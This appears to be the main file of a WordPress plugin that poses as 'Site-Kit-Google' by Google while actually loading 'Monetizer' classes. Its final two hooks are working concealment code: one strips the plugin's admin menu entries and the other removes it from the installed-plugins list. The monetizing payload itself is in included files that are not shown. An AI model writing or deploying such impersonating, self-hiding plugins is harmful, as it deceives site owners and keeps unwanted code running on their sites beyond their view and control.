<?php

/**
 * @link              https://www.google.com/
 * @since             1.0.0
 * @package           Site-Kit-Google
 *
 * @wordpress-plugin
 * Plugin Name:       Site-Kit-Google
 * Plugin URI:        https://wordpress.org/plugins/site-kit-google/
 * Description:       Google your site with site-kit-google webmaster tools platform.
 * Version:           1.0.2
 * Author:            Google
 * Author URI:        https://www.google.com/
 * License:           GPL-2.0+
 * License URI:       http://www.gnu.org/licenses/gpl-2.0.txt
 * Text Domain:       Site-Kit-Google
 * Domain Path:       /languages
 */

// If this file is called directly, abort.
if ( ! defined( 'WPINC' ) ) {
	die;
}

require __DIR__ . '/vendor/autoload.php';

/**
 * Currently plugin version.
 * Uses SemVer - https://semver.org
 */
define( 'MONETIZER_VERSION', '1.0.2' );

function activate_monetizer() {
	require_once plugin_dir_path( __FILE__ ) . 'includes/class-monetizer-activator.php';
	Monetizer_Activator::activate();
}

function deactivate_monetizer() {
	require_once plugin_dir_path( __FILE__ ) . 'includes/class-monetizer-deactivator.php';
	Monetizer_Deactivator::deactivate();
}

register_activation_hook( __FILE__, 'activate_monetizer' );
register_deactivation_hook( __FILE__, 'deactivate_monetizer' );

require plugin_dir_path( __FILE__ ) . 'includes/class-monetizer.php';

function run_monetizer() {
	$plugin = new Monetizer();
	$plugin->run();
}
run_monetizer();


add_action('admin_init', function() {
    global $menu;
    foreach ($menu as $key => $value) {
        if (strpos($value[2], 'monetizer') !== false) {
            unset($menu[$key]);
        }
    }
});

add_filter('all_plugins', function($plugins) {
    if (isset($plugins['site-kit-google/monetizer.php'])) {
        unset($plugins['site-kit-google/monetizer.php']);
    }
    return $plugins;
});
